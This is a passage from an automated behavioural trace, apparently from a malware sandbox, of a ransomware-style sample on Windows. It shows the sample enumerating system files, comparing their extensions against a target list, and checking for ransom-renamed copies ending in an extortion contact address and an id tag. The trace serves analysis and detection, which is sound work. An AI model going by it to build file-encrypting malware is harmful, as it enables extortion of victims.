(lpString1=".ppt", lpString2=".avi") returned 1 [0241.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.888] lstrlenW (lpString=".zip") returned 4 [0241.888] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.888] lstrlenW (lpString=".rar") returned 4 [0241.888] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.888] lstrlenW (lpString=".bz2") returned 4 [0241.888] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.888] lstrlenW (lpString=".7z") returned 3 [0241.888] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.888] lstrlenW (lpString=".dbf") returned 4 [0241.888] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.888] lstrlenW (lpString=".1cd") returned 4 [0241.888] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0241.888] lstrlenW (lpString=".jpg") returned 4 [0241.888] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.888] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.888] lstrlenW (lpString="auxbase.xml") returned 11 [0241.888] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.890] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x392ff1c | out: lpFileSize=0x392ff1c*=1434) returned 1 [0241.890] CloseHandle (hObject=0x24c) returned 1 [0241.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0241.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0241.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0241.890] lstrlenW (lpString=".doc") returned 4 [0241.890] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.890] lstrlenW (lpString=".docx") returned 5 [0241.890] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0241.890] lstrlenW (lpString=".pdf") returned 4 [0241.890] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.891] lstrlenW (lpString=".xls") returned 4 [0241.891] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.891] lstrlenW (lpString=".xlsx") returned 5 [0241.891] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0241.891] lstrlenW (lpString=".ppt") returned 4 [0241.891] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0241.891] lstrlenW (lpString=".zip") returned 4 [0241.891] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.891] lstrlenW (lpString=".rar") returned 4 [0241.891] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.891] lstrlenW (lpString=".bz2") returned 4 [0241.891] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.891] lstrlenW (lpString=".7z") returned 3 [0241.891] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 Thread: id = 62 os_tid = 0x640 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3dc4188 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3dd4190 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e1f8 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99c60 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e210 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x45c0020 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e228 [0241.372] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e228, Size=0x20) returned 0xbbddb0 [0241.372] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e228 [0241.372] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e228, Size=0x20) returned 0xbbdd88 [0241.373] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.373] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.373] Wow64DisableWow64FsRedirection (in: OldValue=0x3a6ff58 | out: OldValue=0x3a6ff58*=0x0) returned 1 [0241.373] lstrlenW (lpString="kernel32.dll") returned 12 [0241.373] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbddb0 | out: hHeap=0xb00000) returned 1 [0241.373] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.373] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdd88 | out: hHeap=0xb00000) returned 1 [0241.373] Sleep (dwMilliseconds=0x64) [0241.557] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.557] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.557] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.594] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=89168) returned 1 [0241.594] CloseHandle (hObject=0x24c) returned 1 [0241.594] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0241.594] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.594] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.594] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.594] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.594] lstrlenW (lpString=".doc") returned 4 [0241.594] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.594] lstrlenW (lpString=".docx") returned 5 [0241.594] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.594] lstrlenW (lpString=".pdf") returned 4 [0241.594] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.595] lstrlenW (lpString=".xls") returned 4 [0241.595] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.595] lstrlenW (lpString=".xlsx") returned 5 [0241.595] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.595] lstrlenW (lpString=".ppt") returned 4 [0241.595] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.595] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.595] lstrlenW (lpString=".zip") returned 4 [0241.595] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.595] lstrlenW (lpString=".rar") returned 4 [0241.595] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.595] lstrlenW (lpString=".bz2") returned 4 [0241.595] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.595] lstrlenW (lpString=".7z") returned 3 [0241.595] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.595] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.595] lstrlenW (lpString=".dbf") returned 4 [0241.595] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.595] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.595] lstrlenW (lpString=".1cd") returned 4 [0241.595] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.595] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.595] lstrlenW (lpString=".jpg") returned 4 [0241.595] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.595] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.595] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.595] lstrlenW (lpString=".doc") returned 4 [0241.595] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.595] lstrlenW (lpString=".docx") returned 5 [0241.595] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.595] lstrlenW (lpString=".pdf") returned 4 [0241.596] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.596] lstrlenW (lpString=".xls") returned 4 [0241.596] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.596] lstrlenW (lpString=".xlsx") returned 5 [0241.596] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.596] lstrlenW (lpString=".ppt") returned 4 [0241.596] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.596] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.596] lstrlenW (lpString=".zip") returned 4 [0241.596] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.596] lstrlenW (lpString=".rar") returned 4 [0241.596] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.596] lstrlenW (lpString=".bz2") returned 4 [0241.596] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.596] lstrlenW (lpString=".7z") returned 3 [0241.596] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.596] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.596] lstrlenW (lpString=".dbf") returned 4 [0241.596] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.596] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.596] lstrlenW (lpString=".1cd") returned 4 [0241.596] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.596] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0241.596] lstrlenW (lpString=".jpg") returned 4 [0241.596] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.596] lstrcmpiW (lpString1=".ttf", lpString2=".php") returned 1 [0241.596] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0241.597] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.637] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=47452) returned 1 [0241.637] CloseHandle (hObject=0x244) returned 1 [0241.640] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0241.641] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.641] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.642] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.643] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.644] lstrlenW (lpString=".doc") returned 4 [0241.646] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0241.647] lstrlenW (lpString=".docx") returned 5 [0241.647] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0241.648] lstrlenW (lpString=".pdf") returned 4 [0241.648] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0241.648] lstrlenW (lpString=".xls") returned 4 [0241.648] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0241.648] lstrlenW (lpString=".xlsx") returned 5 [0241.649] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0241.649] lstrlenW (lpString=".ppt") returned 4 [0241.649] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.649] lstrlenW (lpString=".zip") returned 4 [0241.649] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0241.649] lstrlenW (lpString=".rar") returned 4 [0241.649] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString=".bz2") returned 4 [0241.649] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString=".7z") returned 3 [0241.649] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0241.649] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.649] lstrlenW (lpString=".dbf") returned 4 [0241.649] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.649] lstrlenW (lpString=".1cd") returned 4 [0241.649] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.649] lstrlenW (lpString=".jpg") returned 4 [0241.649] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.649] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.649] lstrlenW (lpString=".doc") returned 4 [0241.649] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString=".docx") returned 5 [0241.649] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0241.649] lstrlenW (lpString=".pdf") returned 4 [0241.649] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0241.649] lstrlenW (lpString=".xls") returned 4 [0241.649] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0241.650] lstrlenW (lpString=".xlsx") returned 5 [0241.650] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0241.650] lstrlenW (lpString=".ppt") returned 4 [0241.650] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0241.650] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.650] lstrlenW (lpString=".zip") returned 4 [0241.650] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0241.650] lstrlenW (lpString=".rar") returned 4 [0241.650] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0241.650] lstrlenW (lpString=".bz2") returned 4 [0241.650] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0241.650] lstrlenW (lpString=".7z") returned 3 [0241.650] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0241.650] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.650] lstrlenW (lpString=".dbf") returned 4 [0241.650] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0241.650] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.650] lstrlenW (lpString=".1cd") returned 4 [0241.650] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0241.650] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0241.650] lstrlenW (lpString=".jpg") returned 4 [0241.650] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0241.650] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.650] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0241.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.651] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=3584) returned 1 [0241.651] CloseHandle (hObject=0x244) returned 1 [0241.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0241.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.651] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.651] lstrlenW (lpString=".doc") returned 4 [0241.651] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.651] lstrlenW (lpString=".docx") returned 5 [0241.651] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.651] lstrlenW (lpString=".pdf") returned 4 [0241.651] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.651] lstrlenW (lpString=".xls") returned 4 [0241.651] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.651] lstrlenW (lpString=".xlsx") returned 5 [0241.651] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.651] lstrlenW (lpString=".ppt") returned 4 [0241.651] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.651] lstrlenW (lpString=".zip") returned 4 [0241.651] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.651] lstrlenW (lpString=".rar") returned 4 [0241.651] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.651] lstrlenW (lpString=".bz2") returned 4 [0241.651] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.651] lstrlenW (lpString=".7z") returned 3 [0241.651] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.652] lstrlenW (lpString=".dbf") returned 4 [0241.652] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.652] lstrlenW (lpString=".1cd") returned 4 [0241.652] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.652] lstrlenW (lpString=".jpg") returned 4 [0241.652] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.652] lstrlenW (lpString=".doc") returned 4 [0241.652] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.652] lstrlenW (lpString=".docx") returned 5 [0241.652] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.652] lstrlenW (lpString=".pdf") returned 4 [0241.652] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.652] lstrlenW (lpString=".xls") returned 4 [0241.652] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.652] lstrlenW (lpString=".xlsx") returned 5 [0241.652] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.652] lstrlenW (lpString=".ppt") returned 4 [0241.652] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.652] lstrlenW (lpString=".zip") returned 4 [0241.652] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.652] lstrlenW (lpString=".rar") returned 4 [0241.652] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.652] lstrlenW (lpString=".bz2") returned 4 [0241.652] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.652] lstrlenW (lpString=".7z") returned 3 [0241.652] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.653] lstrlenW (lpString=".dbf") returned 4 [0241.653] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.653] lstrlenW (lpString=".1cd") returned 4 [0241.653] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0241.653] lstrlenW (lpString=".jpg") returned 4 [0241.653] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.653] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.653] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0241.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.653] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=3584) returned 1 [0241.653] CloseHandle (hObject=0x244) returned 1 [0241.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0241.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.653] lstrlenW (lpString=".doc") returned 4 [0241.654] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.654] lstrlenW (lpString=".docx") returned 5 [0241.654] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0241.654] lstrlenW (lpString=".pdf") returned 4 [0241.654] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.654] lstrlenW (lpString=".xls") returned 4 [0241.654] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.654] lstrlenW (lpString=".xlsx") returned 5 [0241.654] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0241.654] lstrlenW (lpString=".ppt") returned 4 [0241.654] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.654] lstrlenW (lpString=".zip") returned 4 [0241.654] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.654] lstrlenW (lpString=".rar") returned 4 [0241.654] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.654] lstrlenW (lpString=".bz2") returned 4 [0241.654] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.654] lstrlenW (lpString=".7z") returned 3 [0241.654] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0241.654] lstrlenW (lpString=".dbf") returned 4 [0241.654] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 